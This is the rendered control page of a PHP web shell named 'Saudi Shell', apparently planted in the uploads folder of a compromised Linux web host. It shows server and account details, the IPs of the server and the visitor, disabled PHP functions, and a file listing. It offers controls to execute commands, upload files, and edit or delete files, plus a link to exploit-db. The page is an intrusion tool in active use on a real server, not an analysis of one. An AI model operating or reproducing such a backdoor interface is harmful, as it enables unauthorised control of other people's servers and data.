Saudi Shell
OS : Linux cld21.cloud-servers.net 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64   [ Google ]   [ exploit-db ]
safe_mode: OFF
disable_functions : exec,passthru,shell_exec,system
Server : Apache
PHP version : 8.1.34
Id : user = w0323med | uid= 1087 | gid= 1089
Pwd : /home/w0323med/public_html/uploads/meetnvisit  drwxr-xr-x  [ Home ]


Your ip : 216.73.216.102    | ip server : 37.27.141.47 |  list site |  phpinfo |


NameSizeModifyOwner/GroupPermissionsOption
[ . ]dir2025-02-25 04:04:32root/rootdrwxr-xr-x   0755R - C - rm
[ .. ]dir2025-02-25 04:04:32root/rootdrwxr-xr-x   0755R - C - rm
[ __pycache__ ]dir2025-02-25 04:04:32root/rootdrwxr-xr-x   0755R - C - rm
__init__.py0.062024-10-02 19:13:31root/root-rw-r--r--   0644E - R - C - D - rm
candidate.py0.972024-10-02 19:13:31root/root-rw-r--r--   0644E - R - C - D - rm
direct_url.py6.202024-10-02 19:13:31root/root-rw-r--r--   0644E - R - C - D - rm
format_control.py2.462024-10-02 19:13:31root/root-rw-r--r--   0644E - R - C - D - rm
index.py1.012024-10-02 19:13:31root/root-rw-r--r--   0644E - R - C - D - rm
link.py9.592024-10-02 19:13:31root/root-rw-r--r--   0644E - R - C - D - rm
scheme.py0.722024-10-02 19:13:31root/root-rw-r--r--   0644E - R - C - D - rm
search_scope.py4.412024-10-02 19:13:31root/root-rw-r--r--   0644E - R - C - D - rm
selection_prefs.py1.862024-10-02 19:13:31root/root-rw-r--r--   0644E - R - C - D - rm
target_python.py3.772024-10-02 19:13:31root/root-rw-r--r--   0644E - R - C - D - rm
wheel.py3.422024-10-02 19:13:31root/root-rw-r--r--   0644E - R - C - D - rm




Change dir :
Make dir :
read file :
Make file :
Execute :
Upload file :